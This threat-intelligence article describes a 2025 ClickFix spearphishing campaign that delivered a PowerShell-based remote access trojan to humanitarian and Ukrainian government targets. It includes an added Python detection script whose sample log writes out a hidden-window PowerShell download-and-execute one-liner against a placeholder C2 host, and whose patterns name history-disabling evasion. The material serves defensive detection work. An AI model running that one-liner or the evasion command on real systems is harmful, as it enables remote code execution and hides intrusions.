Sophisticated Spearphishing Campaign Targets Humanitarian Organizations with Weaponized PDFs

In early October 2025, cybersecurity researchers uncovered a highly sophisticated spearphishing campaign targeting humanitarian organizations and Ukrainian government agencies. The attackers employed weaponized PDF attachments and counterfeit Cloudflare verification pages to distribute a WebSocket-based remote access trojan (RAT).

Targeted Entities and Deceptive Tactics

The campaign specifically targeted members of the International Red Cross, Norwegian Refugee Council, UNICEF, and regional government administrations across Ukraine. Attackers sent emails impersonating the Ukrainian President’s Office, lending credibility to their malicious communications.

Upon opening the malicious PDF and clicking the embedded link, recipients were redirected to a convincing fake Cloudflare DDoS protection gateway. This counterfeit page mimicked legitimate security verification processes, deceiving users into believing they were undergoing standard security checks.

Infrastructure and Operational Security

The attackers registered the domain zoomconference.app to mimic a legitimate Zoom conference service, hosting their malicious infrastructure on Russian-owned VPS servers located in Finland. Demonstrating advanced operational security, the threat actors maintained their infrastructure for only 24 hours before shutting down public-facing domains while preserving backend command-and-control servers. This approach indicates meticulous planning and a high level of sophistication.

The campaign’s timeline reveals that operations began in March 2025, with SSL certificates issued in September, suggesting extensive preparation before the October execution.

ClickFix Infection Mechanism and Multi-Stage Payload Delivery

Central to the campaign’s effectiveness is the implementation of the ClickFix social engineering technique, increasingly adopted by threat actors since mid-2024.

After the fake Cloudflare page loads, victims encounter a simulated reCAPTCHA interface with an “I’m not a robot” checkbox. Clicking this checkbox triggers a popup containing instructions written in Ukrainian, directing users to copy a token and paste it into the Windows Run dialog using the keyboard shortcut Windows+R. This seemingly innocuous action executes malicious PowerShell code, initiating the infection chain.

The underlying mechanism relies on a JavaScript function named copyToken() that downloads and executes a PowerShell script.

The attackers distributed three stages of payloads:

1. First Stage: A heavily obfuscated 500KB PowerShell downloader whose only real functionality, a simple file download, was buried under layers of code obfuscation.

2. Second Stage: Comprehensive system reconnaissance, collecting computer names, domain information, usernames, process IDs, and hardware identifiers through system UUID retrieval. This data was encrypted using a hardcoded XOR key before transmission.

3. Final Payload: A WebSocket-based remote access trojan capable of receiving arbitrary commands encoded as Base64-formatted JSON messages. This lightweight backdoor connected to remote servers and executed commands using PowerShell’s Invoke-Expression cmdlet, giving attackers full remote command execution and data exfiltration on the compromised host.

The malware disabled PowerShell command history logging to prevent forensic analysis, representing a deliberate effort to cover operational tracks while maintaining persistent access to compromised systems.
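The ClickFix chain described above leaves a recognisable trace on the endpoint: a shell spawned by explorer.exe (the parent of anything launched from the Run dialog) with downloader-style arguments, followed by a command that switches PSReadLine history saving off. The following detection logic is an added example, not code from the article or from the researchers who analysed the campaign. The log lines and their key=value layout are constructed for the example, and the indicator patterns are assumptions a detection engineer would tune to their own telemetry (the real sources would be Windows Event ID 4688 or Sysmon Event ID 1 for process creation and Event ID 4104 for script blocks).

```python
"""Heuristics for the Run-dialog (Win+R) PowerShell pattern used by ClickFix lures.

Added example: the events below are constructed and the indicator lists are
assumptions, not a signature published for this campaign.
"""
import re
from collections import Counter

# A shell launched from the Run dialog has explorer.exe as its parent process.
RUN_DIALOG_PARENTS = {"explorer.exe"}
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe"}

# Command-line features typical of one-line downloaders (assumed indicator set).
SUSPICIOUS_ARGS = [
    re.compile(r"-(?:w|win|window|windowstyle)\s+hidden", re.I),       # hidden window
    re.compile(r"-(?:e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}", re.I),  # encoded command
    re.compile(r"\b(?:iex|invoke-expression)\b", re.I),                # in-memory execution
    re.compile(r"downloadstring|invoke-webrequest|\biwr\b|net\.webclient", re.I),
]

# Turning PSReadLine history off is the documented way to stop console history logging.
HISTORY_DISABLE = re.compile(r"Set-PSReadLineOption\b.*HistorySaveStyle\s+SaveNothing", re.I)


def _basename(path):
    """Return the lower-cased file name from a Windows or POSIX path."""
    return path.lower().replace("/", "\\").rsplit("\\", 1)[-1]


def parse_event(line):
    """Parse a constructed 'key=value|key=value' event line into a dict."""
    fields = {}
    for part in line.split("|"):
        if "=" in part:
            key, value = part.split("=", 1)
            fields[key.strip()] = value.strip()
    return fields


def evaluate(line):
    """Return the list of rule names that fire on a single event line."""
    ev = parse_event(line)
    rules = []
    image = _basename(ev.get("image", ""))
    parent = _basename(ev.get("parent", ""))
    text = ev.get("cmdline", "") + " " + ev.get("script", "")

    if ev.get("type") == "process" and image in SHELLS:
        if any(p.search(text) for p in SUSPICIOUS_ARGS):
            rules.append("suspicious-shell-args")
            # The explorer.exe parent is what distinguishes a Run-dialog launch
            # from a shell started by a terminal, IDE or scheduled task.
            if parent in RUN_DIALOG_PARENTS:
                rules.append("run-dialog-shell-downloader")

    if HISTORY_DISABLE.search(text):
        rules.append("powershell-history-disabled")
    return rules


def scan(lines):
    """Count rule hits across a batch of event lines."""
    counts = Counter()
    for line in lines:
        counts.update(evaluate(line))
    return dict(counts)


# Constructed sample events (not real telemetry from the campaign).
SAMPLE_LOG = [
    # Run-dialog launch with a hidden-window downloader one-liner: both rules fire.
    r"type=process|image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
    r"|parent=C:\Windows\explorer.exe"
    r"|cmdline=powershell -w hidden -c iex((New-Object Net.WebClient).DownloadString(http://c2.example.invalid/t))",
    # An administrator opening a plain shell from Win+R: no finding.
    r"type=process|image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
    r"|parent=C:\Windows\explorer.exe|cmdline=powershell",
    # Hidden, encoded shell started by an editor: suspicious, but not the Run-dialog pattern.
    r"type=process|image=C:\Program Files\Editor\editor.exe\..\powershell.exe"
    r"|parent=C:\Program Files\Editor\editor.exe"
    r"|cmdline=powershell -w hidden -enc QUJDREVGR0hJSktMTU5PUFFSU1RVVlc=",
    # Script block that disables history saving.
    r"type=scriptblock|script=Set-PSReadLineOption -HistorySaveStyle SaveNothing",
]

if __name__ == "__main__":
    for line in SAMPLE_LOG:
        print(evaluate(line), "<-", line[:70])
    print(scan(SAMPLE_LOG))
```

The explorer.exe parent on its own is not evidence (the second sample shows a legitimate Run-dialog launch), so the rule only escalates when downloader-style arguments are present; the history-disabling rule is kept independent because it fires on script-block events, which carry no parent-process field.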

Implications and Recommendations

This campaign underscores the evolving sophistication of cyber threats targeting humanitarian organizations and government agencies. The use of weaponized PDFs, counterfeit security verification pages, and advanced social engineering tactics highlights the need for heightened vigilance and robust cybersecurity measures.

Organizations are advised to:

– Educate Staff: Conduct regular training sessions to raise awareness about phishing tactics and the importance of verifying the authenticity of emails and attachments.

– Implement Multi-Factor Authentication (MFA): Enhance security by requiring multiple forms of verification before granting access to sensitive systems and data.

– Regularly Update Systems: Ensure that all software and systems are up-to-date with the latest security patches to mitigate vulnerabilities.

– Monitor Network Activity: Utilize advanced threat detection systems to monitor for unusual network activity that may indicate a breach.

– Establish Incident Response Plans: Develop and regularly update incident response plans to ensure a swift and effective response to potential security incidents.

By adopting these measures, organizations can better protect themselves against sophisticated cyber threats and minimize the risk of data breaches and system compromises.